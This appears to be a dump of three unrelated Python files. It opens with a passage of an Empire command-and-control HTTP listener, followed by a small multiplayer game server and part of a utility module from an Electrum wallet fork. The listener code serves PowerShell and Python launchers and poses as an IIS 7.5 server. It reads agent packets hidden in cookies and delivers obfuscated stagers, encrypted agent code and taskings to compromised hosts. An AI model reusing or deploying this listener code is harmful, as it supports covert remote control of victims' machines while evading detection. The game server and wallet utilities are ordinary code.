log.setLevel(logging.ERROR)
bindIP = listenerOptions['BindIP']['Value']
host = listenerOptions['Host']['Value']
port = listenerOptions['Port']['Value']
stagingKey = listenerOptions['StagingKey']['Value']
stagerURI = listenerOptions['StagerURI']['Value']
userAgent = self.options['UserAgent']['Value']
listenerName = self.options['Name']['Value']
proxy = self.options['Proxy']['Value']
proxyCreds = self.options['ProxyCreds']['Value']
app = Flask(__name__)
self.app = app
# Set HTTP/1.1 as in IIS 7.5 instead of /1.0
WSGIRequestHandler.protocol_version = "HTTP/1.1"
@app.route('/download/<stager>')
def send_stager(stager):
if 'po' in stager:
launcher = self.mainMenu.stagers.generate_launcher(listenerName, language='powershell', encode=False,
userAgent=userAgent, proxy=proxy,
proxyCreds=proxyCreds)
return launcher
elif 'py' in stager:
launcher = self.mainMenu.stagers.generate_launcher(listenerName, language='python', encode=False,
userAgent=userAgent, proxy=proxy,
proxyCreds=proxyCreds)
return launcher
else:
return make_response(self.default_response(), 404)
@app.before_request
def check_ip():
"""
Before every request, check if the IP address is allowed.
"""
if not self.mainMenu.agents.is_ip_allowed(request.remote_addr):
listenerName = self.options['Name']['Value']
message = "[!] {} on the blacklist/not on the whitelist requested resource".format(request.remote_addr)
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="listeners/http/{}".format(listenerName))
return make_response(self.default_response(), 404)
@app.after_request
def change_header(response):
"Modify the headers response server."
headers = listenerOptions['Headers']['Value']
for key in headers.split("|"):
value = key.split(":")
response.headers[value[0]] = value[1]
return response
@app.after_request
def add_proxy_headers(response):
"Add HTTP headers to avoid proxy caching."
response.headers['Cache-Control'] = "no-cache, no-store, must-revalidate"
response.headers['Pragma'] = "no-cache"
response.headers['Expires'] = "0"
return response
@app.errorhandler(405)
def handle_405(e):
"""
Returns IIS 7.5 405 page for every Flask 405 error.
"""
return make_response(self.method_not_allowed_page(), 405)
@app.route('/')
@app.route('/iisstart.htm')
def serve_index():
"""
Return default server web page if user navigates to index.
"""
static_dir = self.mainMenu.installPath + "data/misc/"
return make_response(self.index_page(), 200)
@app.route('/<path:request_uri>', methods=['GET'])
def handle_get(request_uri):
"""
Handle an agent GET request.
This is used during the first step of the staging process,
and when the agent requests taskings.
"""
if request_uri.lower() == 'welcome.png':
# Serves image loaded by index page.
#
# Thanks to making it case-insensitive it works the same way as in
# an actual IIS server
static_dir = self.mainMenu.installPath + "data/misc/"
return send_from_directory(static_dir, 'welcome.png')
clientIP = request.remote_addr
listenerName = self.options['Name']['Value']
message = "[*] GET request for {}/{} from {}".format(request.host, request_uri, clientIP)
signal = json.dumps({
'print': False,
'message': message
})
dispatcher.send(signal, sender="listeners/http/{}".format(listenerName))
routingPacket = None
cookie = request.headers.get('Cookie')
if cookie and cookie != '':
try:
# see if we can extract the 'routing packet' from the specified cookie location
# NOTE: this can be easily moved to a paramter, another cookie value, etc.
if self.session_cookie in cookie:
listenerName = self.options['Name']['Value']
message = "[*] GET cookie value from {} : {}".format(clientIP, cookie)
signal = json.dumps({
'print': False,
'message': message
})
dispatcher.send(signal, sender="listeners/http/{}".format(listenerName))
cookieParts = cookie.split(';')
for part in cookieParts:
if part.startswith(self.session_cookie):
base64RoutingPacket = part[part.find('=') + 1:]
# decode the routing packet base64 value in the cookie
routingPacket = base64.b64decode(base64RoutingPacket)
except Exception as e:
routingPacket = None
pass
if routingPacket:
# parse the routing packet and process the results
dataResults = self.mainMenu.agents.handle_agent_data(stagingKey, routingPacket, listenerOptions,
clientIP)
if dataResults and len(dataResults) > 0:
for (language, results) in dataResults:
if results:
if isinstance(results, str):
results = results.encode('UTF-8')
if results == b'STAGE0':
# handle_agent_data() signals that the listener should return the stager.ps1 code
# step 2 of negotiation -> return stager.ps1 (stage 1)
listenerName = self.options['Name']['Value']
message = "\n[*] Sending {} stager (stage 1) to {}".format(language, clientIP)
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="listeners/http/{}".format(listenerName))
stage = self.generate_stager(language=language, listenerOptions=listenerOptions,
obfuscate=self.mainMenu.obfuscate,
obfuscationCommand=self.mainMenu.obfuscateCommand)
return make_response(stage, 200)
elif results.startswith(b'ERROR:'):
listenerName = self.options['Name']['Value']
message = "[!] Error from agents.handle_agent_data() for {} from {}: {}".format(
request_uri, clientIP, results)
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="listeners/http/{}".format(listenerName))
if b'not in cache' in results:
# signal the client to restage
print(helpers.color("[*] Orphaned agent from %s, signaling restaging" % (clientIP)))
return make_response(self.default_response(), 401)
else:
return make_response(self.default_response(), 200)
else:
# actual taskings
listenerName = self.options['Name']['Value']
message = "[*] Agent from {} retrieved taskings".format(clientIP)
signal = json.dumps({
'print': False,
'message': message
})
dispatcher.send(signal, sender="listeners/http/{}".format(listenerName))
return make_response(results, 200)
else:
# dispatcher.send("[!] Results are None...", sender='listeners/http')
return make_response(self.default_response(), 200)
else:
return make_response(self.default_response(), 200)
else:
listenerName = self.options['Name']['Value']
message = "[!] {} requested by {} with no routing packet.".format(request_uri, clientIP)
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="listeners/http/{}".format(listenerName))
return make_response(self.default_response(), 404)
@app.route('/<path:request_uri>', methods=['POST'])
def handle_post(request_uri):
"""
Handle an agent POST request.
"""
stagingKey = listenerOptions['StagingKey']['Value']
clientIP = request.remote_addr
requestData = request.get_data()
listenerName = self.options['Name']['Value']
message = "[*] POST request data length from {} : {}".format(clientIP, len(requestData))
signal = json.dumps({
'print': False,
'message': message
})
dispatcher.send(signal, sender="listeners/http/{}".format(listenerName))
# the routing packet should be at the front of the binary request.data
# NOTE: this can also go into a cookie/etc.
dataResults = self.mainMenu.agents.handle_agent_data(stagingKey, requestData, listenerOptions, clientIP)
if dataResults and len(dataResults) > 0:
for (language, results) in dataResults:
if isinstance(results, str):
results = results.encode('UTF-8')
if results:
if results.startswith(b'STAGE2'):
# TODO: document the exact results structure returned
if ':' in clientIP:
clientIP = '[' + str(clientIP) + ']'
sessionID = results.split(b' ')[1].strip().decode('UTF-8')
sessionKey = self.mainMenu.agents.agents[sessionID]['sessionKey']
listenerName = self.options['Name']['Value']
message = "[*] Sending agent (stage 2) to {} at {}".format(sessionID, clientIP)
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="listeners/http/{}".format(listenerName))
hopListenerName = request.headers.get('Hop-Name')
try:
hopListener = helpers.get_listener_options(hopListenerName)
tempListenerOptions = copy.deepcopy(listenerOptions)
tempListenerOptions['Host']['Value'] = hopListener['Host']['Value']
except TypeError:
tempListenerOptions = listenerOptions
# step 6 of negotiation -> server sends patched agent.ps1/agent.py
agentCode = self.generate_agent(language=language, listenerOptions=tempListenerOptions,
obfuscate=self.mainMenu.obfuscate,
obfuscationCommand=self.mainMenu.obfuscateCommand)
encryptedAgent = encryption.aes_encrypt_then_hmac(sessionKey, agentCode)
# TODO: wrap ^ in a routing packet?
return make_response(encryptedAgent, 200)
elif results[:10].lower().startswith(b'error') or results[:10].lower().startswith(b'exception'):
listenerName = self.options['Name']['Value']
message = "[!] Error returned for results by {} : {}".format(clientIP, results)
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="listeners/http/{}".format(listenerName))
return make_response(self.default_response(), 404)
elif results.startswith(b'VALID'):
listenerName = self.options['Name']['Value']
message = "[*] Valid results returned by {}".format(clientIP)
signal = json.dumps({
'print': False,
'message': message
})
dispatcher.send(signal, sender="listeners/http/{}".format(listenerName))
return make_response(self.default_response(), 200)
else:
return make_response(results, 200)
else:
return make_response(self.default_response(), 404)
else:
return make_response(self.default_response(), 404)
try:
certPath = listenerOptions['CertPath']['Value']
host = listenerOptions['Host']['Value']
if certPath.strip() != '' and host.startswith('https'):
certPath = os.path.abspath(certPath)
pyversion = sys.version_info
# support any version of tls
pyversion = sys.version_info
if pyversion[0] == 2 and pyversion[1] == 7 and pyversion[2] >= 13:
proto = ssl.PROTOCOL_TLS
elif pyversion[0] >= 3:
proto = ssl.PROTOCOL_TLS
else:
proto = ssl.PROTOCOL_SSLv23
context = ssl.SSLContext(proto)
context.load_cert_chain("%s/empire-chain.pem" % (certPath), "%s/empire-priv.key" % (certPath))
cipherlist_tls12 = ["ECDHE-RSA-AES256-GCM-SHA384", "ECDHE-RSA-AES128-GCM-SHA256", "ECDHE-RSA-AES256-SHA384", "AES256-SHA256", "AES128-SHA256"]
cipherlist_tls10 = ["ECDHE-RSA-AES256-SHA"]
selectciph = random.choice(cipherlist_tls12)+':'+random.choice(cipherlist_tls10)
context.set_ciphers(selectciph)
app.run(host=bindIP, port=int(port), threaded=True, ssl_context=context)
else:
app.run(host=bindIP, port=int(port), threaded=True)
except Exception as e:
print(helpers.color("[!] Listener startup on port %s failed: %s " % (port, e)))
listenerName = self.options['Name']['Value']
message = "[!] Listener startup on port {} failed: {}".format(port, e)
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="listeners/http/{}".format(listenerName))
def start(self, name=''):
"""
Start a threaded instance of self.start_server() and store it in the
self.threads dictionary keyed by the listener name.
"""
listenerOptions = self.options
if name and name != '':
self.threads[name] = helpers.KThread(target=self.start_server, args=(listenerOptions,))
self.threads[name].start()
time.sleep(1)
# returns True if the listener successfully started, false otherwise
return self.threads[name].is_alive()
else:
name = listenerOptions['Name']['Value']
self.threads[name] = helpers.KThread(target=self.start_server, args=(listenerOptions,))
self.threads[name].start()
time.sleep(1)
# returns True if the listener successfully started, false otherwise
return self.threads[name].is_alive()
def shutdown(self, name=''):
"""
Terminates the server thread stored in the self.threads dictionary,
keyed by the listener name.
"""
if name and name != '':
print(helpers.color("[!] Killing listener '%s'" % (name)))
self.threads[name].kill()
else:
print(helpers.color("[!] Killing listener '%s'" % (self.options['Name']['Value'])))
self.threads[self.options['Name']['Value']].kill()
def generate_cookie(self):
"""
Generate Cookie
"""
chars = string.ascii_letters
cookie = helpers.random_string(random.randint(6, 16), charset=chars)
return cookie
|
server.py | #! /usr/bin/python
import socket
import SocketServer
import threading
import sys
import os
import logging
import struct
import time
# Custom Imports
import world
from commands import *
from shared_functions import *
HOST = ''
PORT = 6699
CURRENT_VERSION = 0x100
logging.basicConfig(
level = logging.DEBUG
)
logger = logging.getLogger()
class ThreadedTCPRequestHandler(SocketServer.BaseRequestHandler):
def setup(self):
self.request.setblocking(0)
def handle(self):
self.server.clients.append(self.request)
try:
while True:
data = ''
try:
data = length = self.request.recv(4)
except socket.error as e:
if e.errno == 11:
continue
raise
length = ''.join([ c.encode('hex') for c in length ])
# Deduct the 4 bytes we've just grabbed that contain the
# length.
length = int(length, base=16) - 4
while length:
page = self.request.recv(length)
data = data + page if data else page
length -= len(page)
logger.debug(data.encode('hex'))
self.process_request(data)
except Exception as e:
logger.exception('Exception occurred in handle')
finally:
#Disconnected.
self.server.disconnect(self.request)
def process_request(self, message):
if not message:
return
block = [ c.encode('hex') for c in message ]
length, version, command = None, None, None
try:
length = int(''.join(block[:4]), base=16)
version = int(''.join(block[4:8]),base=16)
command = int(''.join(block[8:12]),base=16)
except:
#content doesn't match our requests. dump it.
return
logger.debug( (version, command) )
decoder = client[version].get(command)
if command == MOVE:
# Player moved.
m = struct.unpack(decoder(len(block[12:])),message)
m = cleanup(m)
try:
move_player(
m[3], self.server.world.getPlayer(
self.server.clients.index(self.request)
)
)
except world.MoveException as m:
logger.exception('invalid movement for player {}'.format(
self.server.world.getPlayer(
self.server.clients.index(self.request)
).name
))
m = struct.pack(
server[version][MOVE](len(m[3])), 16+len(m[3]), version,
MOVE, self.server.clients.index(self.request), m[3]
)
self.server.broadcast(self.request,m)
elif command == PLAYER_CONNECT:
# They want to know which player they are.
w = self.server.world.getXMLasString()
#print( w )
m = struct.pack(server[version][WORLD](len(w)), 12+len(w), version,
WORLD, w)
#world.draw(self.server.world)
self.sendall(self.request, m)
m = None
if len(self.server.clients) < 2:
# Wait for more players.
m = struct.pack(
server[version][PLAYER_WAIT], 12, version, PLAYER_WAIT
)
self.sendall(self.request, m)
else:
if not self.server.started:
# Start the game.
for sock in self.server.clients:
p = world.Player(self.server.clients.index(sock), '&',
name='Player {}'.format(self.server.clients.index(sock))
)
self.server.world.addPlayer(p)
self.server.started = True
else:
p = world.Player(
self.server.clients.index(self.request), '&',
name='Player {}'.format(self.server.clients.index(self.request))
)
self.server.world.addPlayer(p)
w = self.server.world.getXMLasString()
m = struct.pack(server[version][WORLD](len(w)), 12+len(w), version,
WORLD, w)
self.server.broadcast(None, m)
for sock in self.server.clients:
m = struct.pack(
server[version].get(command), 16, version, command,
self.server.clients.index(sock)
)
self.sendall(sock, m)
else:
logger.debug(block)
def send(self, sock, data):
logger.debug(data.encode('hex'))
return sock.send(data)
def sendall(self, sock, data):
logger.debug(data.encode('hex'))
return sock.sendall(data)
class GameServer(SocketServer.ThreadingTCPServer):
def __init__(self, server_address, handler_class):
#super(GameServer,self).__init__(server_address,handler_class)
SocketServer.ThreadingTCPServer.__init__(self, server_address, handler_class)
self.clients = []
self.world = None
self.newWorld()
self.started = False
def newWorld(self):
self.world = world.World()
world.buildRooms(self.world, 17, 11, 3)
c = world.CorridorBuilder(self.world)
c.generate()
def startPing(self):
self.pingThread = threading.Thread(target=self.pinger)
self.pingThread.daemon = True
self.pingThread.start()
def broadcast(self, omitsock,message):
for sock in self.clients:
if sock != omitsock:
try:
self.send(sock, message)
except socket.error as e:
if e.errno == 9 or e.errno == 32:
try:
sock.shutdown()
sock.close()
except:
pass
finally:
self.disconnect(sock)
else:
raise
def pinger(self):
p = struct.pack(server[CURRENT_VERSION][PING], 12, CURRENT_VERSION, PING)
while not finished:
try:
self.broadcast(None, p)
except:
logger.exception('in ping thread')
time.sleep(3)
def disconnect(self, sock):
logger.debug('player disconnected')
i = self.clients.index(sock)
m = struct.pack(
server[CURRENT_VERSION][PLAYER_DISCONNECT], 16,
CURRENT_VERSION, PLAYER_DISCONNECT, i
)
self.broadcast(sock, m)
p = self.world.players[i]
y, x = p.getPosition()
self.world.getMatrix()[y][x] = world.BaseTile()
del(self.world.players[i])
self.clients.remove(sock)
#world.draw(self.world)
def __main__():
primary_server = GameServer(
(HOST, PORT), ThreadedTCPRequestHandler
)
primary_server.allow_reuse_address = True
ip, port = primary_server.server_address
logger.info('Serving on {}:{} in PID: {}'.format(ip,port,os.getpid()))
primary_server.serve_forever()
if __name__ == '__main__':
finished = False
try:
while not finished:
try:
__main__()
except socket.error as e:
if e.errno == 98:
PORT -= 1
else:
raise
except KeyboardInterrupt as k:
finished = True
logger.info('caught ctrl + c')
sys.exit()
|
util.py | # Electrum - lightweight Bitcoin client
# Copyright (C) 2011 Thomas Voegtlin
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import binascii
import os, sys, re, json
from collections import defaultdict
from datetime import datetime
import decimal
from decimal import Decimal
import traceback
import urllib
import threading
import hmac
import stat
from .i18n import _
import urllib.request, urllib.parse, urllib.error
import queue
def inv_dict(d):
return {v: k for k, v in d.items()}
base_units = {'ZILLA':8, 'mBTC':5, 'bits':2, 'sat':0}
base_units_inverse = inv_dict(base_units)
base_units_list = ['ZILLA', 'mBTC', 'bits', 'sat'] # list(dict) does not guarantee order
def decimal_point_to_base_unit_name(dp: int) -> str:
# e.g. 8 -> "BTC"
try:
return base_units_inverse[dp]
except KeyError:
raise Exception('Unknown base unit')
def base_unit_name_to_decimal_point(unit_name: str) -> int:
# e.g. "BTC" -> 8
try:
return base_units[unit_name]
except KeyError:
raise Exception('Unknown base unit')
def normalize_version(v):
return [int(x) for x in re.sub(r'(\.0+)*$','', v).split(".")]
class NotEnoughFunds(Exception): pass
class NoDynamicFeeEstimates(Exception):
def __str__(self):
return _('Dynamic fee estimates not available')
class InvalidPassword(Exception):
def __str__(self):
return _("Incorrect password")
class FileImportFailed(Exception):
def __init__(self, message=''):
self.message = str(message)
def __str__(self):
return _("Failed to import from file.") + "\n" + self.message
class FileExportFailed(Exception):
def __init__(self, message=''):
self.message = str(message)
def __str__(self):
return _("Failed to export to file.") + "\n" + self.message
class TimeoutException(Exception):
def __init__(self, message=''):
self.message = str(message)
def __str__(self):
if not self.message:
return _("Operation timed out.")
return self.message
class WalletFileException(Exception): pass
class BitcoinException(Exception): pass
# Throw this exception to unwind the stack like when an error occurs.
# However unlike other exceptions the user won't be informed.
class UserCancelled(Exception):
'''An exception that is suppressed from the user'''
pass
class Satoshis(object):
def __new__(cls, value):
self = super(Satoshis, cls).__new__(cls)
self.value = value
return self
def __repr__(self):
return 'Satoshis(%d)'%self.value
def __str__(self):
return format_satoshis(self.value) + " ZILLA"
class Fiat(object):
def __new__(cls, value, ccy):
self = super(Fiat, cls).__new__(cls)
self.ccy = ccy
self.value = value
return self
def __repr__(self):
return 'Fiat(%s)'% self.__str__()
def __str__(self):
if self.value.is_nan():
return _('No Data')
else:
return "{:.2f}".format(self.value) + ' ' + self.ccy
class MyEncoder(json.JSONEncoder):
def default(self, obj):
from .transaction import Transaction
if isinstance(obj, Transaction):
return obj.as_dict()
if isinstance(obj, Satoshis):
return str(obj)
if isinstance(obj, Fiat):
return str(obj)
if isinstance(obj, Decimal):
return str(obj)
if isinstance(obj, datetime):
return obj.isoformat(' ')[:-3]
if isinstance(obj, set):
return list(obj)
return super(MyEncoder, self).default(obj)
class PrintError(object):
'''A handy base class'''
def diagnostic_name(self):
return self.__class__.__name__
def print_error(self, *msg):
# only prints with --verbose flag
print_error("[%s]" % self.diagnostic_name(), *msg)
def print_stderr(self, *msg):
print_stderr("[%s]" % self.diagnostic_name(), *msg)
def print_msg(self, *msg):
print_msg("[%s]" % self.diagnostic_name(), *msg)
class ThreadJob(PrintError):
"""A job that is run periodically from a thread's main loop. run() is
called from that thread's context.
"""
def run(self):
"""Called periodically from the thread"""
pass
class DebugMem(ThreadJob):
'''A handy class for debugging GC memory leaks'''
def __init__(self, classes, interval=30):
self.next_time = 0
self.classes = classes
self.interval = interval
def mem_stats(self):
import gc
self.print_error("Start memscan")
gc.collect()
objmap = defaultdict(list)
for obj in gc.get_objects():
for class_ in self.classes:
if isinstance(obj, class_):
objmap[class_].append(obj)
for class_, objs in objmap.items():
self.print_error("%s: %d" % (class_.__name__, len(objs)))
self.print_error("Finish memscan")
def run(self):
if time.time() > self.next_time:
self.mem_stats()
self.next_time = time.time() + self.interval
class DaemonThread(threading.Thread, PrintError):
""" daemon thread that terminates cleanly """
def __init__(self):
threading.Thread.__init__(self)
self.parent_thread = threading.currentThread()
self.running = False
self.running_lock = threading.Lock()
self.job_lock = threading.Lock()
self.jobs = []
def add_jobs(self, jobs):
with self.job_lock:
self.jobs.extend(jobs)
def run_jobs(self):
# Don't let a throwing job disrupt the thread, future runs of
# itself, or other jobs. This is useful protection against
# malformed or malicious server responses
with self.job_lock:
for job in self.jobs:
try:
job.run()
except Exception as e:
traceback.print_exc(file=sys.stderr)
def remove_jobs(self, jobs):
with self.job_lock:
for job in jobs:
self.jobs.remove(job)
def start(self):
with self.running_lock:
self.running = True
return threading.Thread.start(self)
def is_running(self):
with self.running_lock:
return self.running and self.parent_thread.is_alive()
def stop(self):
with self.running_lock:
self.running = False
def on_stop(self):
if 'ANDROID_DATA' in os.environ:
import jnius
jnius.detach()
self.print_error("jnius detach")
self.print_error("stopped")
# TODO: disable
is_verbose = True
def set_verbosity(b):
global is_verbose
is_verbose = b
def print_error(*args):
if not is_verbose: return
print_stderr(*args)
def print_stderr(*args):
args = [str(item) for item in args]
sys.stderr.write(" ".join(args) + "\n")
sys.stderr.flush()
def print_msg(*args):
# Stringify args
args = [str(item) for item in args]
sys.stdout.write(" ".join(args) + "\n")
sys.stdout.flush()
def json_encode(obj):
try:
s = json.dumps(obj, sort_keys = True, indent = 4, cls=MyEncoder)
except TypeError:
s = repr(obj)
return s
def json_decode(x):
try:
return json.loads(x, parse_float=Decimal)
except:
return x
# taken from Django Source Code
def constant_time_compare(val1, val2):
"""Return True if the two strings are equal, False otherwise."""
return hmac.compare_digest(to_bytes(val1, 'utf8'), to_bytes(val2, 'utf8'))
# decorator that prints execution time
def profiler(func):
def do_profile(func, args, kw_args):
n = func.__name__
t0 = time.time()
o = func(*args, **kw_args)
t = time.time() - t0
print_error("[profiler]", n, "%.4f"%t)
return o
return lambda *args, **kw_args: do_profile(func, args, kw_args)
def android_ext_dir():
import jnius
env = jnius.autoclass('android.os.Environment')
return env.getExternalStorageDirectory().getPath()
def android_data_dir():
import jnius
PythonActivity = jnius.autoclass('org.kivy.android.PythonActivity')
return PythonActivity.mActivity.getFilesDir().getPath() + '/data'
def android_headers_dir():
d = android_ext_dir() + '/org.electrum.electrum'
if not os.path.exists(d):
os.mkdir(d)
return d
def android_check_data_dir():
""" if needed, move old directory to sandbox """
ext_dir = android_ext_dir()
data_dir = android_data_dir()
old_electrum_dir = ext_dir + '/electrum'
if not os.path.exists(data_dir) and os.path.exists(old_electrum_dir):
import shutil
new_headers_path = android_headers_dir() + '/blockchain_headers'
old_headers_path = old_electrum_dir + '/blockchain_headers'
if not os.path.exists(new_headers_path) and os.path.exists(old_headers_path):
print_error("Moving headers file to", new_headers_path)
shutil.move(old_headers_path, new_headers_path)
print_error("Moving data to", data_dir)
shutil.move(old_electrum_dir, data_dir)
return data_dir
def get_headers_dir(config):
return android_headers_dir() if 'ANDROID_DATA' in os.environ else config.path
def assert_datadir_available(config_path):
path = config_path
if os.path.exists(path):
return
else:
raise FileNotFoundError(
'Electrum datadir does not exist. Was it deleted while running?' + '\n' +
'Should be at {}'.format(path))
def assert_file_in_datadir_available(path, config_path):
if os.path.exists(path):
return
else:
assert_datadir_available(config_path)
raise FileNotFoundError(
'Cannot find file but datadir is there.' + '\n' +
'Should be at {}'.format(path))
def assert_bytes(*args):
"""
porting helper, assert args type
"""
try:
for x in args:
assert isinstance(x, (bytes, bytearray))
except:
print('assert bytes failed', list(map(type, args)))
raise
def assert_str(*args):
"""
porting helper, assert args type
"""
for x in args:
assert isinstance(x, str)
def to_string(x, enc):
if isinstance(x, (bytes, bytearray)):
return x.decode(enc)
if isinstance(x, str):
return x
else:
raise TypeError("Not a string or bytes like object")
def to_bytes(something, encoding='utf8'):
"""
cast string to bytes() like object, but for python2 support it's bytearray copy
"""
if isinstance(something, bytes):
return something
if isinstance(something, str):
return something.encode(encoding)
elif isinstance(something, bytearray):
return bytes(something)
else:
raise TypeError("Not a string or bytes like object")
bfh = bytes.fromhex
hfu = binascii.hexlify
def bh2u(x):
"""
str with hex representation of a bytes-like object
>>> x = bytes((1, 2, 10))
>>> bh2u(x)
'01020A'
:param x: bytes
:rtype: str
"""
return hfu(x).decode('ascii')
def user_dir():
if 'ANDROID_DATA' in os.environ:
return android_check_data_dir()
elif os.name == 'posix':
return os.path.join(os.environ["HOME"], ".electrum-zilla")
elif "APPDATA" in os.environ:
return os.path.join(os.environ["APPDATA"], "Electrum-Zilla")
elif "LOCALAPPDATA" in os.environ:
return os.path.join(os.environ["LOCALAPPDATA"], "Electrum-Zilla")
else:
#raise Exception("No home directory found in environment variables.")
return
def is_valid_email(s):
regexp = r"[^@]+@[^@]+\.[^@]+"
return re.match(regexp, s) is not None
def format_satoshis_plain(x, decimal_point = 8):
"""Display a satoshi amount scaled. Always uses a '.' as a decimal
point and has no thousands separator"""
scale_factor = pow(10, decimal_point)
return "{:.8f}".format(Decimal(x) / scale_factor).rstrip('0').rstrip('.')
def format_satoshis(x, num_zeros=0, decimal_point=8, precision=None, is_diff=False, whitespaces=False):
from locale import localeconv
if x is None:
return 'unknown'
if precision is None:
precision = decimal_point
decimal_format = ".0" + str(precision) if precision > 0 else ""
if is_diff:
decimal_format = '+' + decimal_format
result = ("{:" + decimal_format + "f}").format(x / pow (10, decimal_point)).rstrip('0')
integer_part, fract_part = result.split(".")
dp = localeconv()['decimal_point']
if len(fract_part) < num_zeros:
fract_part += "0" * (num_zeros - len(fract_part))
result = integer_part + dp + fract_part
if whitespaces:
result += " " * (decimal_point - len(fract_part))
result = " " * (15 - len(result)) + result
return result
FEERATE_PRECISION = 1 # num fractional decimal places for sat/byte fee rates
_feerate_quanta = Decimal(10) ** (-FEERATE_PRECISION)
def format_fee_satoshis(fee, num_zeros=0):
return format_satoshis(fee, num_zeros, 0, precision=FEERATE_PRECISION)
def quantize_feerate(fee):
"""Strip sat/byte fee rate of excess precision."""
if fee is None:
return None
return Decimal(fee).quantize(_feerate_quanta, rounding=decimal.ROUND_HALF_DOWN)
def timestamp_to_datetime(timestamp):
if timestamp is None:
return None
return datetime.fromtimestamp(timestamp)
def format_time(timestamp):
date = timestamp_to_datetime(timestamp)
return date.isoformat(' ')[:-3] if date else _("Unknown")
# Takes a timestamp and returns a string with the approximation of the age
def age(from_date, since_date = None, target_tz=None, include_seconds=False):
if from_date is None:
return "Unknown"
from_date = datetime.fromtimestamp(from_date)
if since_date is None:
since_date = datetime.now(target_tz)
td = time_difference(from_date - since_date, include_seconds)
return td + " ago" if from_date < since_date else "in " + td
def time_difference(distance_in_time, include_seconds):
#distance_in_time = since_date - from_date
distance_in_seconds = int(round(abs(distance_in_time.days * 86400 + distance_in_time.seconds)))
distance_in_minutes = int(round(distance_in_seconds/60))
if distance_in_minutes <= 1:
if include_seconds:
for remainder in [5, 10, 20]:
if distance_in_seconds < remainder:
return "less than %s seconds" % remainder
if distance_in_seconds < 40:
return "half a minute"
elif distance_in_seconds < 60:
return "less than a minute"
else:
return "1 minute"
else:
if distance_in_minutes == 0:
return "less than a minute"
else:
return "1 minute"
elif distance_in_minutes < 45:
return "%s minutes" % distance_in_minutes
elif distance_in_minutes < 90:
return "about 1 hour"
elif distance_in_minutes < 1440:
return "about %d hours" % (round(distance_in_minutes / 60.0))
elif distance_in_minutes < 2880:
return "1 day"
elif distance_in_minutes < 43220:
return "%d days" % (round(distance_in_minutes / 1440))
elif distance_in_minutes < 86400:
return "about 1 month"
elif distance_in_minutes < 525600:
return "%d months" % (round(distance_in_minutes / 43200))
elif distance_in_minutes < 1051200:
return "about 1 year"
else:
return "over %d years" % (round(distance_in_minutes / 525600))
mainnet_block_explorers = {
'zillaexplorer' : ('https://zillaexplorer.io/',
{'tx': 'tx/', 'addr': 'address/'}),
'system default': ('blockchain:/',
{'tx': 'tx/', 'addr': 'address/'}),
}
testnet_block_explorers = {
'Blocktrail.com': ('https://www.blocktrail.com/tBTC/',
{'tx': 'tx/', 'addr': 'address/'}),
'system default': ('blockchain://000000000933ea01ad0ee984209779baaec3ced90fa3f408719526f8d77f4943/',
{'tx': 'tx/', 'addr': 'address/'}),
}
def block_explorer_info():
from . import constants
return testnet_block_explorers if constants.net.TESTNET else mainnet_block_explorers
def block_explorer(config):
return config.get('block_explorer', 'Blocktrail.com')
def block_explorer_tuple(config):
return block_explorer_info().get(block_explorer(config))
def block_explorer_URL(config, kind, item):
be_tuple = block_explorer_tuple(config)
if not be_tuple:
return
kind_str = be_tuple[1].get(kind)
if not kind_str:
return
url_parts = [be_tuple[0], kind_str, item]
return ''.join(url_parts)
# URL decode
#_ud = re.compile('%([0-9a-hA-H]{2})', re.MULTILINE)
#urldecode = lambda x: _ud.sub(lambda m: chr(int(m.group(1), 16)), x)
def parse_URI(uri, on_pr=None):
from . import bitcoin
from .bitcoin import COIN
if ':' not in uri:
if not bitcoin.is_address(uri):
raise Exception("Not a bitcoin address")
return {'address': uri}
u = urllib.parse.urlparse(uri)
if u.scheme != 'bitcoin':
raise Exception("Not a bitcoin URI")
address = u.path
# python for android fails to parse query
if address.find('?') > 0:
address, query = u.path.split('?')
pq = urllib.parse.parse_qs(query)
else:
pq = urllib.parse.parse_qs(u.query)
for k, v in pq.items():
if len(v)!=1:
raise Exception('Duplicate Key', k)
out = {k: v[0] for k, v in pq.items()}
if address:
if not bitcoin.is_address(address):
raise Exception("Invalid bitcoin address:" + address)
out['address'] = address
if 'amount' in out:
am = out['amount']
m = re.match('([0-9\.]+)X([0-9])', am)
if m:
k = int(m.group(2)) - 8
amount = Decimal(m.group(1)) * pow( Decimal(10) , k)
else:
amount = Decimal(am) * COIN
out['amount'] = int(amount)
if 'message' in out:
out['message'] = out['message']
out['memo'] = out['message']
if 'time' in out:
out['time'] = int(out['time'])
if 'exp' in out:
out['exp'] = int(out['exp'])
if 'sig' in out:
out['sig'] = bh2u(bitcoin.base_decode(out['sig'], None, base=58))
r = out.get('r')
sig = out.get('sig')
name = out.get('name')
if on_pr and (r or (name and sig)):
def get_payment_request_thread():
from . import paymentrequest as pr
if name and sig:
s = pr.serialize_request(out).SerializeToString()
request = pr.PaymentRequest(s)
else:
request = pr.get_payment_request(r)
if on_pr:
on_pr(request)
t = threading.Thread(target=get_payment_request_thread)
t.setDaemon(True)
t.start()
return out
def create_URI(addr, amount, message):
from . import bitcoin
if not bitcoin.is_address(addr):
return ""
query = []
if amount:
